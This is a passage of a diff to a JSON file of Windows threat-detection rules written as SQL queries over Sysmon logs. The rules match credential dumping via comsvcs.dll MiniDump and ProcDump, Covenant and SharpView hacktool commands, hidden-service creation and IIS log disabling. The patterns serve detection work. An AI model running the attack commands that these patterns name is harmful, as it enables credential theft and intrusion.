CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron 
Systems)", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of 
systems they access or through information discovery of remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE 
'%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a 
suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Exotic software" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine 
LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE 
'% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administration activity" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + 
"SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": 
"4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "status": "experimental", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": 
"1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "status": "experimental", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", "status": "stable", - "description": "Detects 
exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a hidden network share. 
